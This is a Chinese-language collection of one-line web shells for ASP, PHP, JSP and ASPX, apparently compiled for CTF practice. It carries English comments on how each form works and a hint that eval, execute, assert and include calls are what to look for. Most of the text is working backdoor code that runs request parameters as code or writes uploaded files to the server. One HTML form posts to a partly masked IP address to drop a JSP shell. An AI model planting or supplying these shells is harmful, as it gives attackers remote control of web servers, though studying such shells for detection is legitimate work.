最近总是碰到考小马(一句话木马)的题目,所以把见过的各种写法按语言收集在这里,碰到新的再更新。它们的共同点是把请求参数直接交给 eval/execute/assert/include 之类的调用去执行,或者直接写成文件,排查时盯住这几类调用即可。
ASP
<%eval request("sb")%>
<%execute request("sb")%>
<%execute(request("sb"))%>
<%execute request("sb")%><%
<%<%execute request("sb")%>
<%execute request("sb")[code]
[code]
<script language=vbs runat=server>eval(request("sb"))</script>
<%execute request("sb")[code]
[code]
<script language=vbs runat=server>eval(request("sb"))</script>
%>
<%Eval(Request(chr(35)))%><%
<%eval request("sb")%>
<%ExecuteGlobal request("sb")%>
' Passes the request value "sb" to ExecuteGlobal, but only when that value is non-empty.
' Nothing visible here validates or restricts the value before it is executed.
' NOTE(review): the line break before <> looks like an extraction artifact; VBScript
' would need this condition on one line. The enclosing <% %> tags are not part of the fragment.
if Request("sb")
<>"" then ExecuteGlobal request("sb") end if
PHP
<?php eval(
// POST field sb is handed to eval() as PHP source; nothing here validates or restricts it.
// The key sb is unquoted, which relies on PHP before 8.0 treating an undefined constant as a string.
$_POST[sb])
?>
<?php @
// Same eval() of POST field sb; the @ operator only suppresses error output from the call.
eval(
$_POST[sb])
?>
<?php assert(
// assert() given a string evaluates it as PHP code on PHP before 8.0 (string assertions were
// deprecated in 7.2), so on those runtimes this behaves like the eval() forms in this group.
$_POST[sb]);
?>
<?$_POST[
// Variable-function call: the callee name is read from POST field 'sa' and its single
// argument from POST field 'sb', so no function name appears literally in the file.
// For review and scanning, a call whose callee is a request superglobal is the thing to match on.
// The bare <? opener only parses where short_open_tag is enabled.
'sa'](
$_POST[
'sb']);
?>
<?$_POST[
// Same variable-function pattern with two request-supplied arguments ('sb' and 'sc').
'sa'](
$_POST[
'sb'],
$_POST[
'sc'])
?>
<?php
// preg_replace() with the /e modifier evaluates the replacement argument as PHP code for
// each match. Here the replacement is POST field 'h' and the subject is the constant
// string "error". The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so
// this form only executes on older runtimes.
// The leading @ suppresses error output from the call.
// NOTE(review): the pattern text "[email]" looks like residue of e-mail masking on the
// page rather than the author's original pattern; it cannot be recovered from here.
@preg_replace(
"/[email]/e",
$_POST[
'h'],
"error");
?>
<O>h=@
eval(
$_POST[c]);</O>
<script language=
"php">@
eval(
$_POST[sb])</script>
<?=@
eval(
$_POST[
'cmd']);
<?=`*`;
// The include target is read directly from the query-string parameter 'xbid'.
// No allow-list, basename() or extension check is applied before include runs it,
// so whatever file the path resolves to is executed as PHP.
// Fragment only: the opening <?php tag is not part of this snippet.
$filename=
$_GET[
'xbid'];
include (
$filename);
// $reg is built by concatenation to hold the string "copy" and is then called as a
// function, so copy never appears as a literal call in the source. Scanning for the
// function name alone misses this; a variable-function call taking $_FILES does not.
// Arguments: the upload's temporary path and its client-supplied file name, so the
// uploaded file is copied under whatever name the client sent.
// NOTE(review): the destination is a relative path, presumably resolved against the
// script's working directory; confirm per deployment.
// MyFile, tmp_name and name are unquoted, which relies on PHP before 8.0 treating
// undefined constants as strings.
$reg=
"c".
"o".
"p".
"y";
$reg(
$_FILES[MyFile][tmp_name],
$_FILES[MyFile][name]);
JSP
<%
// When request parameter "f" is present, opens a FileOutputStream at
// application.getRealPath("\\") + f and writes the bytes of request parameter "t" to it.
// Both the file name and the content come from the request; no validation is visible
// here and the stream is never closed.
// NOTE(review): getRealPath presumably resolves inside the web application root, which
// would make the written file servable. When reviewing JSPs, look for FileOutputStream
// or similar writers constructed from request.getParameter values.
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code
</textarea><BR><center><br>
<input type=submit value="提交">
</form>
ASPX
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//以上两行是 JScript 的 ASP.NET 一句话(直接 eval 请求参数)
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//上一行是 C# 的 ASP.NET 一句话(上传型:把上传的文件保存到参数 f 指定的路径)
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
//上一行是 VB 的 ASP.NET 一句话(上传型:把上传的文件保存到参数 f 指定的路径)